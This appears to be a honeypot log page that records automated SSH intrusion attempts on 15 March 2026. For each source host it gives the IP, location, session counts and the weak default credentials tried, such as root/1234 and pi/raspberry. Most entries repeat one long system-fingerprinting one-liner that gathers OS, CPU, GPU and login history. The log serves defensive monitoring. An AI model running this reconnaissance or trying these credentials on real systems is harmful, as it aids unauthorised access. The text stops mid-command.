$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 autobahn_root_16 (165.22.25.213) — Frankfurt am Main, Germany · 7 sessions · 28 cmds

2026-03-15 11:30 EDT · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 liberty_root_17 (172.210.53.196) — Boydton, United States · 1 session · 1 cmd

2026-03-15 11:50 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 beefeater_root_6 (178.62.50.224) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-03-15 11:29 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 tulip_root_15 (209.38.40.94) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-15 10:34 EDT · as root/123456, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 pretzel_root_15 (157.230.101.198) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-03-15 10:28 EDT · as root/1234, root/admin123, root/pass123

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 stein_root_19 (209.38.222.136) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-03-15 10:07 EDT · as docker/docker123, pi/raspberry, ubuntu/ubuntu

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 crumpet_root_10 (46.101.91.71) — Slough, United Kingdom · 5 sessions · 20 cmds

2026-03-15 09:45 EDT · as oracle/oracle, postgres/postgres, root/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 barbie_root_6 (170.64.183.186) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-15 09:39 EDT · as root/1234, root/123456, root/root

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 windmill_root_7 (134.209.200.134) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-15 09:10 EDT · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 eagle_root_17 (172.182.195.226) — Phoenix, United States · 1 session · 1 cmd

2026-03-15 08:46 EDT · as root/1234

netstat

$ netstat -tulpn | head -10

🎭 tea_root_9 (209.97.141.224) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-03-15 08:31 EDT · as root/123456, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 spice_root_6 (159.65.158.45) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-15 08:17 EDT · as root/123456, root/admin, root/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 barbie_root_2 (134.199.172.133) — Sydney, Australia · 2 sessions · 2 cmds

2026-03-15 08:13 EDT · as admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 spice_root_7 (167.71.228.111) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-15 08:04 EDT · as root/admin, root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 roo_root_4 (170.64.179.164) — Sydney, Australia · 4 sessions · 16 cmds

2026-03-15 07:36 EDT · as admin/admin123, root/1234, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 reef_root_2 (170.64.165.10) — Sydney, Australia · 7 sessions · 28 cmds

2026-03-15 06:20 EDT · as root/123456, root/12345678, root/admin

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 stein_root_5 (116.203.29.12) — Nuremberg, Germany · 35 sessions · 35 cmds

2026-03-15 04:52 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 35x across 35 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 tiger_root_6 (206.189.130.47) — Bengaluru, India · 1 session · 4 cmds

2026-03-15 05:37 EDT · as root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 silk_root_21 (14.103.117.93) — Beijing, China · 1 session · 1 cmd

2026-03-15 04:59 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 fog_root_13 (206.189.22.86) — Slough, United Kingdom · 5 sessions · 20 cmds

2026-03-15 04:14 EDT · as oracle/oracle, postgres/postgres, root/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 reef_root (170.64.232.12) — Sydney, Australia · 2 sessions · 2 cmds

2026-03-15 03:59 EDT · as admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 outback_root_3 (170.64.159.210) — Sydney, Australia · 6 sessions · 24 cmds

2026-03-15 02:25 EDT · as root/1234, root/123456, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo 